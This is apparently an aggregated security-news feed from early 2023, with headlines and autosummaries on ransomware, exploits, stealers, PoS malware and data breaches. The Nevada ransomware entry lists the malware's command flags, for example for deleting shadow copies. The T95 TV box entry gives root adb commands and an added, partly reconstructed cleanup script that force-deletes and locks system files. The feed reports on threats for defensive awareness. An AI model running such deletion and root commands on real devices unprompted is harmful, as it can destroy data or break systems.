                A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control. Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users. "Each enrolled device complies with the policies you set until you wipe or deprovision it," Google "

                Autosummary: The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, among others – that can be flashed to a USB drive. "


                New LockBit Green ransomware variant borrows code from Conti ransomware

                exploits ransomware
                2023-02-01 https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html

                Lockbit ransomware operators have released a new version of their malware, LockBit Green, that also targets cloud-based services. Lockbit ransomware operators have implemented a new version of their malware, dubbed LockBit Green, which was designed to include cloud-based services among its targets. This is the third version of the ransomware developed by the notorious gang, […]

                The post New LockBit Green ransomware variant borrows code from Conti ransomware appeared first on Security Affairs.

                "

                Autosummary: The hashes and YARA rule can be found here: 👉https://t.co/0A9waHAwZj #lockbit #ransomware — PRODAFT (@PRODAFT) January 30, 2023 "


                Arnold Clark customer data stolen in attack claimed by Play ransomware

                exploits ransomware
                2023-02-01 https://www.bleepingcomputer.com/news/security/arnold-clark-customer-data-stolen-in-attack-claimed-by-play-ransomware/
                Arnold Clark, self-described as Europe's largest independent car retailer, is notifying some customers that their personal information has been stolen in a December 23 cyberattack claimed by the Play ransomware group. [...] "

                Autosummary: "


                Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076)

                exploits industry
                2023-02-01 https://www.helpnetsecurity.com/2023/02/01/cve-2023-20076/

                Cisco has released patches for a high-severity vulnerability (CVE-2023-20076) found in some of its industrial routers, gateways and enterprise wireless access points, which may allow attackers to insert malicious code that can’t be deleted by simply rebooting the device or updating its firmware. “In this case, the command injection bypasses mitigations Cisco has in place to ensure vulnerabilities do not persist in a system. Side-stepping this security measure means that if an attacker exploits this … More

                The post Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076) appeared first on Help Net Security.

                "

                Autosummary: IOS XE-based devices configured with IOx (i.e., routers capable of running third-party apps inside of a containerized environment); Cisco Catalyst Access points (wireless access points for enterprise environments with a high number of connected devices); IR510 WPAN Industrial Routers (wireless routers for smart factories and smart grids); CGR1000 Compute Modules (for enterprise cloud services). There are no workarounds available. "


                New Prilex PoS Malware evolves to target NFC-enabled credit cards

                exploits
                2023-02-01 https://securityaffairs.com/141686/malware/prilex-pos-malware-nfc-enabled-credit-cards.html

                Authors of the Prilex PoS malware improved their malicious code to target contactless credit card transactions. The threat actors behind the sophisticated point-of-sale (PoS) malware Prilex have improved its capabilities to block contactless payment transactions. Researchers from Kaspersky Lab discovered three new versions of the PoS malware designed to target credit cards using NFC technology. […]

                The post New Prilex PoS Malware evolves to target NFC-enabled credit cards appeared first on Security Affairs.

                "

                Autosummary: "


                LockBit ransomware goes "Green," uses new Conti-based encryptor

                exploits ransomware
                2023-02-01 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-goes-green-uses-new-conti-based-encryptor/
                The LockBit ransomware gang has again started using encryptors based on other operations, this time switching to one based on the leaked source code for the Conti ransomware. [...] "

                Autosummary: This week, cybersecurity collective VX-Underground first reported that the ransomware gang is now using a new encryptor named "LockBit Green," based on the leaked source code of the now-disbanded Conti gang. "


                Over 1,800 Android phishing forms for sale on cybercrime market

                financial
                2023-02-01 https://www.bleepingcomputer.com/news/security/over-1-800-android-phishing-forms-for-sale-on-cybercrime-market/
                A threat actor named InTheBox is promoting on Russian cybercrime forums an inventory of 1,894 web injects (overlays of phishing windows) for stealing credentials and sensitive data from banking, cryptocurrency exchange, and e-commerce apps [...] "

                Autosummary: "


                Google Fi data breach let hackers carry out SIM swap attacks

                financial
                2023-02-01 https://www.bleepingcomputer.com/news/security/google-fi-data-breach-let-hackers-carry-out-sim-swap-attacks/
                Google Fi, Google's U.S.-only telecommunications and mobile internet service, has informed customers that personal data was exposed by a data breach at one of its primary network providers, with some customers warned that it allowed SIM swapping attacks. [...] "

                Autosummary: Google clarified that the breached systems did not hold sensitive details such as full names, email addresses, payment card information, SSNs, tax IDs, government IDs, account passwords, or contents of SMS and phone calls. "


                New Nevada Ransomware targets Windows and VMware ESXi systems

                exploits ransomware
                2023-02-01 https://www.bleepingcomputer.com/news/security/new-nevada-ransomware-targets-windows-and-vmware-esxi-systems/
                A relatively new ransomware operation known as Nevada seems to grow its capabilities quickly as security researchers noticed improved functionality for the locker targeting Windows and VMware ESXi systems. [...] "

                Autosummary: Targeting Windows hosts The Nevada ransomware variant that focuses on Windows machines is executed via console and supports a set of flags that give its operators some control over the encryption: -file > encrypt selected file -dir > encrypt selected directory -sd > self delete after everything done -sc > delete shadow copies -lhd > load hidden drives -nd > find and encrypt network shares -sm > safe mode encryption One interesting characteristic of Nevada ransomware is the set of system locales it spares from the encryption process. "


                Take a tour of the Edgescan Cybersecurity Platform

                ciber
                2023-02-01 https://grahamcluley.com/feed-sponsor-edgescan-2/
                Graham Cluley Security News is sponsored this week by the folks at Edgescan. Thanks to the great team there for their support! Edgescan simplifies Vulnerability Management (VM) by delivering a single full-stack SaaS solution integrated with world-class security professionals. Edgescan helps enterprise companies consolidate managing multiple point scanning tools for each layer of the attack … Continue reading "Take a tour of the Edgescan Cybersecurity Platform" "

                Autosummary: "


                Researchers Uncover New Bugs in Popular ImageMagick Image Processing Utility

                exploits
                2023-02-01 https://thehackernews.com/2023/02/researchers-uncover-new-bugs-in-popular.html
                Cybersecurity researchers have disclosed details of two security flaws in the open source ImageMagick software that could potentially lead to a denial-of-service (DoS) and information disclosure. The two issues, which were identified by Latin American cybersecurity firm Metabase Q in version 7.1.0-49, were addressed in ImageMagick version 7.1.0-52, released in November 2022. A "

                Autosummary: "


                New HeadCrab malware infects 1,200 Redis servers to mine Monero

                exploits
                2023-02-01 https://www.bleepingcomputer.com/news/security/new-headcrab-malware-infects-1-200-redis-servers-to-mine-monero/
                New stealthy malware designed to hunt down vulnerable Redis servers online has infected over a thousand of them since September 2021 to build a botnet that mines for Monero cryptocurrency. [...] "

                Autosummary: To defend their Redis servers, admins are advised to ensure that only clients within their networks can access them, to disable the "slaveof" feature if it's unused, and enable protected mode, which configures the instance to only respond to the loopback address and refuse connections from other IP addresses. "


                Ransomware in December 2022

                exploits
                2023-02-01 https://www.malwarebytes.com/blog/threat-intelligence/2023/02/ransomware-in-december-2022

                Categories: Threat Intelligence

                Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in December 2022, and looks at why LockBit had to make a public apology


                The post Ransomware in December 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: February 1, 2023. Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their dark web leak sites. Known ransomware attacks by industry sector in December 2022; known ransomware attacks by country in December 2022. In terms of progress, the two newcomers that we introduced last month, Play and Project Relic, have vastly different stories to tell. "


                3 ways to stop cybersecurity concerns from hindering utility infrastructure modernization efforts

                ciber
                2023-01-31 https://www.helpnetsecurity.com/2023/01/31/cybersecurity-concerns-utility-infrastructure-modernization-efforts/

                Utility infrastructure is in dire need of modernization. In many parts of the world, the infrastructure delivering power and water to consumers is not ready to withstand natural disasters and rising energy demands. Integrating real-time data analytics into the decision-making process is one way to kick start modernization efforts, yet nearly one in five utilities are not making use of the tools they have due to security and data privacy concerns, according to Itron’s 2022 … More

                The post 3 ways to stop cybersecurity concerns from hindering utility infrastructure modernization efforts appeared first on Help Net Security.

                "

                Autosummary: Standard defenses—multi-factor authentication, role-based access controls, internal audit processes, spam filters, preventing Microsoft Office macros, endpoint detection and response, data loss prevention solutions, etc.—go a long way to making it easier for employees to make the right decisions and tougher for bad actors to get in. Other security considerations include aging OT, which can be challenging to update and to protect, the lack of control over third-party technologies and IoT devices such as smart home devices and solar panels, and finally, the biggest threat of all: human error. Integrating real-time data analytics into the decision-making process is one way to kick start modernization efforts, yet nearly one in five utilities are not making use of the tools they have due to security and data privacy concerns, according to Itron’s 2022 Resourcefulness Report. "


                Is President Biden’s National Cybersecurity Strategy a good idea?

                ciber
                2023-01-31 https://www.helpnetsecurity.com/2023/01/31/president-biden-national-cybersecurity-strategy-video/

                In this Help Net Security video, Kurtis Minder, CEO of GroupSense, discusses President Biden’s National Cybersecurity Strategy, designed to take the nation’s cybersecurity posture to the next level. While the strategy promises to make it much easier for government agencies to launch offensive cyberattacks on adversaries, it betrays why the U.S. has fallen behind modern cyber threats. It’s important to remember that the U.S. started serious offensive cyber operations with Stuxnet in 2010. Since then, … More

                The post Is President Biden’s National Cybersecurity Strategy a good idea? appeared first on Help Net Security.

                "

                Autosummary: "


                Budget constraints force cybersecurity teams to do more with less

                ciber
                2023-01-31 https://www.helpnetsecurity.com/2023/01/31/cybersecurity-budget-constraints/

                49% of organizations have sufficient budget to fully meet their current cybersecurity needs, and 11% can, at best, protect only their most critical assets, according to a survey by the Neustar International Security Council. Despite the rapidly changing threat landscape, 35% of information technology and security professionals responding to the survey said their organization’s cybersecurity budget would remain the same or decrease in 2023, and 44% of these individuals believe their business will be more … More

                The post Budget constraints force cybersecurity teams to do more with less appeared first on Help Net Security.

                "

                Autosummary: "


                QNAP Fixes Critical Vulnerability in NAS Devices with Latest Security Updates

                exploits
                2023-01-31 https://thehackernews.com/2023/01/qnap-fixes-critical-vulnerability-in.html
                Taiwanese company QNAP has released updates to remediate a critical security flaw affecting its network-attached storage (NAS) devices that could lead to arbitrary code injection. Tracked as CVE-2022-27596, the vulnerability is rated 9.8 out of a maximum of 10 on the CVSS scoring scale. It affects QTS 5.0.1 and QuTS hero h5.0.1. "If exploited, this vulnerability allows remote attackers to inject "

                Autosummary: "


                Critical QNAP NAS vulnerability fixed, update your device ASAP! (CVE-2022-27596)

                exploits
                2023-01-31 https://www.helpnetsecurity.com/2023/01/31/cve-2022-27596/

                QNAP Systems has fixed a critical vulnerability (CVE-2022-27596) affecting QNAP network-attached storage (NAS) devices, which could be exploited by remote attackers to inject malicious code into a vulnerable system. Luckily for QNAP NAS owners, there’s no mention of it being exploited by attackers or an exploit being publicly available. About CVE-2022-27596 QNAP’s advisory does not offer more details about CVE-2022-27596, but the vulnerability entry in NIST’s National Vulnerability Database reveals that the flaw may allow … More

                The post Critical QNAP NAS vulnerability fixed, update your device ASAP! (CVE-2022-27596) appeared first on Help Net Security.

                "

                Autosummary: "


                New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector

                exploits industry
                2023-01-31 https://thehackernews.com/2023/01/new-report-reveals-nikowiper-malware.html
                The Russia-affiliated Sandworm used yet another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine. "The NikoWiper is based on SDelete, a command line utility from Microsoft that is used for securely deleting files," cybersecurity company ESET revealed in its latest APT Activity Report shared with The Hacker

                Autosummary: "Any country with a nexus to the Ukraine crisis, particularly those with key geopolitical, economic, or military relationships with Russia or Ukraine, are at increased risk of targeting," the company said in a technical report published last week.


                Researchers Uncover Packer Used by Several Malware to Evade Detection for 6 Years

                exploits
                2023-01-31 https://thehackernews.com/2023/01/researchers-uncover-packer-that-helped.html
                A shellcode-based packer dubbed TrickGate has been successfully operating without attracting notice for over six years, while enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years. "TrickGate managed to stay under the radar for years because it is transformative – it undergoes changes periodically



                Exploit released for critical VMware vRealize RCE vulnerability

                exploits
                2023-01-31 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-vmware-vrealize-rce-vulnerability/
                Horizon3 security researchers have released proof-of-concept (PoC) code for a VMware vRealize Log Insight vulnerability chain that allows attackers to gain remote code execution on unpatched appliances. [...]

                Autosummary: VMware also fixed a deserialization vulnerability (CVE-2022-31710) which triggers denial of service states, and an information disclosure bug (CVE-2022-31711) that attackers can use to gain access to sensitive session and application info.


                Microsoft disables verified partner accounts used for OAuth phishing

                financial
                2023-01-31 https://www.bleepingcomputer.com/news/security/microsoft-disables-verified-partner-accounts-used-for-oauth-phishing/
                Microsoft has disabled multiple fraudulent, verified Microsoft Partner Network accounts for creating malicious OAuth applications that breached organizations' cloud environments to steal email. [...]

                Autosummary: Two of the apps were named "Single Sign On (SSO)," and the third one was called "Meeting," requesting access to the following permissions: Read your mail; Maintain access to data you have given it access to; Read your mailbox settings; Sign you in and read your profile; Send mail as you; Read your calendars; Read your online meetings. Unfortunately, Proofpoint saw evidence of multiple users impacted by the attacks, resulting in the compromise of their organizations.


                Microsoft: Over 100 threat actors deploy ransomware in attacks

                exploits ransomware
                2023-01-31 https://www.bleepingcomputer.com/news/security/microsoft-over-100-threat-actors-deploy-ransomware-in-attacks/
                Microsoft revealed today that its security teams are tracking more than 100 threat actors deploying ransomware during attacks. [...]

                Autosummary: "Some of the most prominent ransomware payloads in recent campaigns include Lockbit Black, BlackCat (aka ALPHV), Play, Vice Society, Black Basta, & Royal," Microsoft said.


                PoS malware can block contactless payments to steal credit cards

                exploits
                2023-01-31 https://www.bleepingcomputer.com/news/security/pos-malware-can-block-contactless-payments-to-steal-credit-cards/
                New versions of the Prilex point-of-sale malware can block secure, NFC-enabled contactless credit card transactions, forcing consumers to insert credit cards that are then stolen by the malware. [...]

                Autosummary: Kaspersky, following the Prilex PoS malware closely, reports seeing at least three new variants in the wild, with version numbers 06.03.8070, 06.03.8072, and 06.03.8080, first released in November 2022.


                Experts released VMware vRealize Log RCE exploit for CVE-2022-31706

                exploits
                2023-01-31 https://securityaffairs.com/141628/hacking/vmware-vrealize-log-rce-poc-resealed.html

                Horizon3 security researchers released proof-of-concept (PoC) code for VMware vRealize Log Insight RCE vulnerability CVE-2022-31706. Last week, researchers from Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution in VMware vRealize Log tracked as CVE-2022-31706 (CVSS base 9.8/10). The PoC exploit code will trigger a series of flaws in VMware […]

                The post Experts released VMware vRealize Log RCE exploit for CVE-2022-31706 appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMware vRealize Log Insight) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Government promises robust crypto regulation

                government
                2023-01-31 https://www.bbc.co.uk/news/technology-64468617?at_medium=RSS&at_campaign=KARANGA
                Proposals are being set out as scandals and tumbling values raise questions about the industry's future.



                Mounting pressure is creating a ticking time bomb for railway cybersecurity

                ciber
                2023-01-30 https://www.helpnetsecurity.com/2023/01/30/dimitri-van-zantvliet-railway-cybersecurity/

                The expansion of potential cyber threats has increased due to the integration of connected devices, the Internet of Things (IoT), and the convergence of IT and OT in railway operations. In this Help Net Security interview, Dimitri van Zantvliet, Cybersecurity Director/CISO of Dutch Railways and co-chair of the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, building a practical cybersecurity approach, and cyber legislation. The railroad industry … More

                The post Mounting pressure is creating a ticking time bomb for railway cybersecurity appeared first on Help Net Security.

                "

                Autosummary: In this Help Net Security interview, Dimitri van Zantvliet is the Cybersecurity Director/CISO of Dutch Railways, and co-chair to the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, build a practical cybersecurity approach, as well as cyber legislation. Develop a security strategy: Based on the results of your risk assessment, develop a comprehensive security strategy that includes an Information Security Management System (ISMS), policies, procedures, and controls to protect against identified threats.It depends a bit on the Purdue level this asset is working in, but some of the ways to address this issue include: Network segmentation: logically isolate them from the rest of the network, so that if an attacker does manage to compromise the system, they will not be able to move laterally to other parts of the network. In general, I believe that requiring institutions, groups, and companies whose service interruptions might jeopardize the economy or public security to report cyber incidents is a positive step towards improving the security of our critical infrastructure. "


                ICS vulnerabilities: Insights from advisories, how CVEs are reported

                industry
                2023-01-30 https://www.helpnetsecurity.com/2023/01/30/ics-vulnerabilities-advisories-cve-video/

                SynSaber recently released its second Industrial Control Systems (ICS) Vulnerabilities & CVEs Report. In this Help Net Security video, Ronnie Fabela, CTO at SynSaber, talks about the key findings: For the CVEs reported in the second half of 2022, 35% have no patch or remediation currently available from the vendor (up from 13% in the first half of the year) While 56% of the CVEs have been reported by the Original Equipment Manufacturer (OEM), 43% … More

                The post ICS vulnerabilities: Insights from advisories, how CVEs are reported appeared first on Help Net Security.

                "

                Autosummary: "


                Realtek Vulnerability Under Attack: 134 Million Attempts in 2 Months to Hack IoT Devices

                exploits industry
                2023-01-30 https://thehackernews.com/2023/01/realtek-vulnerability-under-attack-134.html
                Researchers are warning about a spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK since the start of August 2022. According to Palo Alto Networks Unit 42, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months. Close to 50% of the attacks



                UNC2565 threat actors continue to improve the GOOTLOADER malware

                exploits ransomware
                2023-01-30 https://securityaffairs.com/141539/malware/gootloader-malware-evolution.html

                The threat actors behind the GOOTLOADER malware continue to improve their code by adding new components and implementing new obfuscation techniques. Mandiant researchers reported that the UNC2565 group behind the GOOTLOADER malware (aka Gootkit) continues to improve their code by adding new components and implementing new obfuscation techniques. Gootkit runs on an access-as-a-service model, it is used […]

                The post UNC2565 threat actors continue to improve the GOOTLOADER malware appeared first on Security Affairs.

                "

                Autosummary: “This new variant has been observed trojanizing several legitimate JavaScript libraries, including jQuery, Chroma.js, and Underscore.js” Upon successful execution of the GOOTLOADER file, additional payloads are downloaded, including FONELAUNCH and Cobalt Strike BEACON or SNOWCONE that will be stored in the registry.Payload (See Infection Chain) GOOTLOADER GOOTLOADER GOOTLOADER.POWERSHELL “Beginning in November 2022, Managed Defense observed a new obfuscation variant, tracked as variant 3, with modified infection that is more complex than the previous variants. Mandiant researchers observed the UNC2565 group adopting three obfuscation techniques, such as hiding the code within altered versions of legitimate JavaScript libraries such as jQuery, Chroma.js, and Underscore.js, in an attempt to evade detection. "


                Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

                exploits
                2023-01-30 https://thehackernews.com/2023/01/titan-stealer-new-golang-based.html
                A new Golang-based information stealer malware dubbed Titan Stealer is being advertised by threat actors through their Telegram channel. "The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers

                Autosummary: Some of the major web browsers targeted by Titan Stealer include Google Chrome, Mozilla Firefox, Microsoft Edge, Yandex, Opera, Brave, Vivaldi, 7 Star Browser, Iridium Browser, and others.


                Brazilian police hunt dangerous prisoners after jail break

                latam
                2023-01-30 https://www.bbc.co.uk/news/world-latin-america-64451913?at_medium=RSS&at_campaign=KARANGA
                The three inmates, one a notorious drug lord, lowered themselves from a window using bed-sheets.



                QNAP fixes critical bug letting hackers inject malicious code

                exploits
                2023-01-30 https://www.bleepingcomputer.com/news/security/qnap-fixes-critical-bug-letting-hackers-inject-malicious-code/
                QNAP is warning customers to install QTS and QuTS firmware updates that fix a critical security vulnerability allowing remote attackers to inject malicious code on QNAP NAS devices. [...]



                U.S. No Fly list shared on a hacking forum, government investigating

                government
                2023-01-30 https://www.bleepingcomputer.com/news/security/us-no-fly-list-shared-on-a-hacking-forum-government-investigating/
                A U.S. No Fly list with over 1.5 million records of banned flyers and upwards of 250,000 "selectees" has been shared publicly on a hacking forum. BleepingComputer has confirmed the list is the same TSA No Fly list that was discovered recently on an unsecured CommuteAir server. [...]

                Autosummary: The hacker, maia arson crimew, previously known by aliases deletescape, antiproprietary, and Tillie Kottmann, was earlier indicted by a U.S. grand jury over conspiracy, wire fraud, and aggravated identity theft charges (PDF). Interestingly, the list discovered in 2021 by Diachenko was rather detailed, containing fields such as names, gender, passport number along with the country of issuance, TSC ID, watchlist ID, etc., compared to the one published on the forum this month. The list is, however, referenced by private airlines and multiple agencies such as the Department of State, Department of Defense, Transportation Security Administration (TSA), and Customs and Border Protection (CBP) to check if a passenger is allowed to fly or inadmissible to the U.S., or to assess their risk for various other activities.


                Latvia says Russian hackers tried to phish its Ministry of Defence

                rusia-ucrania
                2023-01-30 https://www.bitdefender.com/blog/hotforsecurity/latvia-says-russian-hackers-tried-to-phish-its-ministry-of-defence/
                The Kremlin-backed Gamaredon hacking group is being blamed for an attempted phishing attack against the Latvian Ministry of Defence. Read more in my article on the Hot for Security blog.



                A glut of wiper malware hits Ukrainian targets

                exploits
                2023-01-30 https://www.helpnetsecurity.com/2023/01/30/wiper-ukrainian-organizations/

                ESET researchers have discovered yet another wiper malware used to target Ukrainian organizations. Dubbed SwiftSlicer, it is thought to be wielded by the Sandworm APT. Simultaneously, the Ukrainian CERT has confirmed that the attackers who recently aimed to disrupt the operation of the National News Agency of Ukraine (Ukrinform) used various wiper malware and one legitimate Windows command line utility to try to “destroy” machines running different operating systems. They believe the Sandworm team was … More

                The post A glut of wiper malware hits Ukrainian targets appeared first on Help Net Security.

                "

                Autosummary: Wipers target Ukraine Fortinet security researcher Geri Révay recently recapped last year’s “explosion” of wiper malware, and made / reiterated a few interesting points: Ransomware can serve as a wiper, if attackers can’t share the decryption key Wipers can masquerade as ransomware Wipers for OT environments are a thing The growth in wiper malware during a conflict is to be expected, as its main function is destruction, and most of the new wipers detected in 2022 were aimed at Ukrainian organizations Earlier this month, CERT-UA fended off the cyberattack against Ukrinform and limited its destructive effect to some parts of the agency’s information infrastructure – “a limited number of data storage systems,” according to the State Special Communications Service of Ukraine. "


                Researcher received a $27,000 bounty for 2FA bypass bug in Facebook and Instagram

                exploits
                2023-01-30 https://securityaffairs.com/141571/social-networks/facebook-instagram-bug.html

                A researcher disclosed technical details of a two-factor authentication bypass vulnerability affecting Instagram and Facebook. The researcher Gtm Manoz received a $27,000 bug bounty for having reported a two-factor authentication bypass vulnerability affecting Instagram and Facebook. The flaw resides in a component used by the parent company Meta for confirming a phone number and email […]

                The post Researcher received a $27,000 bounty for 2FA bypass bug in Facebook and Instagram appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Facebook) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                KeePass disputes vulnerability allowing stealthy password theft

                exploits
                2023-01-30 https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
                The development team behind the open-source password management software KeePass is disputing what is described as a newly found vulnerability that allows attackers to stealthily export the entire database in plain text. [...]

                Autosummary: "Please note that an enforced configuration file only applies to the KeePass program in the same directory," the KeePass development team says, "If the user runs another copy of KeePass without an enforced configuration file, this copy does not know the enforced configuration file that is stored elsewhere, i.e. no settings are enforced."


                JD Sports discloses a data breach impacting 10 million customers

                financial
                2023-01-30 https://securityaffairs.com/141580/data-breach/jd-sports-data-breach.html

                Sports fashion retailer JD Sports disclosed a data breach that exposed data of about 10M customers who placed orders between 2018 and 2020. UK sports fashion chain JD Sports disclosed a data breach that exposed customer data from orders placed between November 2018 and October 2020. The company discovered unauthorized access to a server that contained […]

                The post JD Sports discloses a data breach impacting 10 million customers appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Porsche halts NFT launch, phishing sites fill the void

                financial
                2023-01-30 https://www.bleepingcomputer.com/news/security/porsche-halts-nft-launch-phishing-sites-fill-the-void/
                Porsche cut its minting of a new NFT collection short after a dismal turnout and backlash from the crypto community, allowing threat actors to fill the void by creating phishing sites that steal digital assets from cryptocurrency wallets. [...]

                Autosummary: While this account linked to Porsche's real Discord channel, it also linked to a malicious site ("porsche-nfts.com") that's visually a clone of Porsche's genuine NFT portal at "nft.porsche.com." While the actual site has a notice about the minting closure, the fake one pretends that the procedure is still underway, inviting users to link their wallets.


                Analyzing and remediating a malware infested T95 TV box from Amazon

                exploits
                2023-01-30 https://www.malwarebytes.com/blog/news/2023/01/preinstalled-malware-infested-t95-tv-box-from-amazon

                Find out why one of our Android experts has been obsessing over a little black box from Amazon.

                The post Analyzing and remediating a malware infested T95 TV box from Amazon appeared first on Malwarebytes Labs.

                "

                Autosummary: With your computer connected to the T95 TV box, open a terminal (this is Command Prompt on Windows) and type: adb devices
                There should be an ID number followed by the word device under List of devices attached, for example:
                List of devices attached
                12345c3006c0c721d0e device
                Now you are ready to remediate some nasties! First, you need to gain root access: adb root
                Now, enter shell: adb shell
                From shell, check to confirm that Corejava exists (the output will tell you): test -d /data/system/Corejava/ && echo "You are infected with Corejava!!!"
                Every app, which is called an Android Package Kit (APK) on Android, contains a classes.dex file, along with other directories and files required for the classes.dex to load and run. Corejava classes.dex's code contained a lot of references to using internet traffic: GET commands, POST commands, HTTP, HTTPS, etc. With this information, I did everything from analyzing system level bash scripts on the device, looking for keywords such as Corejava within every file, to uninstalling apps to see if it resolved.
                That starts with removing /data/system/Corejava/ and anything in it: rm -rf /data/system/Corejava
                Now that it's gone, we need to stop it from ever coming back. Using the command touch, create an empty file named Corejava in /data/system: touch /data/system/Corejava
                Next, change the permissions so nothing can modify it: chmod 000 /data/system/Corejava
                This last step is key: busybox chattr +i /data/system/Corejava
                Because "a file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata cannot be modified, and the file cannot be opened in write mode."
                With these settings in place, whenever the system tries to create /data/system/Corejava, it will be denied as seen in the output from logcat | grep Corejava run in shell: FileUtils: Failed to chmod(/data/system/Corejava): android.system.
                com.swe.dgbluancher
                For example, all your app icons, widgets, clock, getting to Settings, etc. If, for whatever reason, you need to revert to DGBLuancher, here's the command: adb shell pm install -r --user 0 /system/priv-app/Launcher10/Launcher10.apk
                Note that the above pm uninstall command uses -k to quote "keep the data and cache directories around after package removal", and --user 0 to only uninstall for the current user.
                To factory reset the T95: Go to the Gear icon for the settings screen; Navigate to More Settings; Navigate to Device Preferences; Scroll down to bottom and press Reset; Read the warning, and proceed with Reset if you're willing to go ahead. After the reset, do not connect the T95 TV box to a network just yet.
                Exploring the network traffic: When I am looking into network traffic, my very first step is installing NoRoot Firewall, as referenced in the Toolset section above.
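                The Corejava remediation sequence summarised above (check for the directory, delete it, replace it with an empty file, chmod 000, busybox chattr +i), collected into one POSIX shell script. This is an added example, not the Malwarebytes author's script or any tool from the article: the function names and the CJ_DIR override are assumptions made here, and the `pm uninstall -k --user 0 com.swe.dgbluancher` line is reconstructed from the article's description of that command (the flags, the package name and the matching `pm install` appear above, the uninstall command itself is cut off). Run it inside `adb shell` after `adb root` on the box, or point CJ_DIR at a scratch directory on a PC to dry-run the file-system part.

```shell
#!/bin/sh
# Added example (not from the Malwarebytes article): Corejava remediation for the T95 box.
# On the device:  adb root && adb push remediate.sh /data/local/tmp/ && \
#                 adb shell sh /data/local/tmp/remediate.sh run
# Dry run on a PC: CJ_DIR=/tmp/scratch sh remediate.sh run
# Function names, CJ_DIR and the file name remediate.sh are assumptions for this example.

# Default is the real location on the box; override for testing.
CJ_DIR="${CJ_DIR:-/data/system}"

# Exit 0 if the dropper's working directory exists (the article's `test -d` check).
corejava_present() {
    [ -d "$1/Corejava" ]
}

# Delete Corejava and park an unwritable, immutable regular file on its path so the
# system can no longer recreate the directory (the chmod then fails, as the article's
# logcat excerpt shows). Exit 0 once the placeholder is a plain file.
corejava_block() {
    target="$1/Corejava"
    rm -rf "$target"                      # 1. remove Corejava and everything in it
    touch "$target"                       # 2. occupy the path with an empty file
    chmod 000 "$target"                   # 3. strip every permission bit
    if command -v busybox >/dev/null 2>&1; then
        busybox chattr +i "$target" 2>/dev/null || true   # 4. immutable bit (root only)
    elif command -v chattr >/dev/null 2>&1; then
        chattr +i "$target" 2>/dev/null || true           # PC dry run may lack privilege
    fi
    [ -f "$target" ] && [ ! -d "$target" ]
}

# Reconstructed from the article's description of the uninstall step: drop the
# tampered launcher for user 0, keeping its data (-k) so it can be restored with
#   pm install -r --user 0 /system/priv-app/Launcher10/Launcher10.apk
launcher_remove() {
    if command -v pm >/dev/null 2>&1; then
        pm uninstall -k --user 0 com.swe.dgbluancher
    else
        echo "pm not found: not running on the device, skipping launcher removal" >&2
    fi
}

# Only act when invoked with the argument `run`; sourcing the file just defines
# the functions.
if [ "${1:-}" = "run" ]; then
    if corejava_present "$CJ_DIR"; then
        echo "Corejava present under $CJ_DIR: removing and blocking"
        corejava_block "$CJ_DIR" && launcher_remove
    else
        echo "no Corejava directory under $CJ_DIR"
    fi
fi
```

The placeholder file is what makes the fix stick across reboots: the dropper calls mkdir on a path that is already a regular file, and with the immutable bit set nothing short of `chattr -i` as root can remove or replace it. On a PC without root the chattr step is skipped, so a dry run only proves the delete-and-replace logic.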


                Riot Games refuses to pay ransom to avoid League of Legends leak

                industry
                2023-01-30 https://www.malwarebytes.com/blog/news/2023/01/stolen-code-from-riot-games-already-being-auctioned-off


                The Riot Games breach saga continues.


                The post Riot Games refuses to pay ransom to avoid League of Legends leak appeared first on Malwarebytes Labs.

                "

                Autosummary: Motherboard was able to obtain a copy of the ransom email and partially shared the content with its readers, which we have replicated below: Dear Riot Games, We have obtained your valuable data, including the precious anti-cheat source code and the entire game code for League of Legends and its tools, as well as Packman, your usermode anti-cheat.


                Former Brazilian president Jair Bolsonaro has applied for US visa

                latam
                2023-01-30 https://www.bbc.co.uk/news/world-us-canada-64460747?at_medium=RSS&at_campaign=KARANGA
                The ex-president, currently staying in Florida, wants to "enjoy being a tourist", his lawyer says.



                Gootkit Malware Continues to Evolve with New Components and Obfuscations

                exploits ransomware
                2023-01-29 https://thehackernews.com/2023/01/gootkit-malware-continues-to-evolve.html
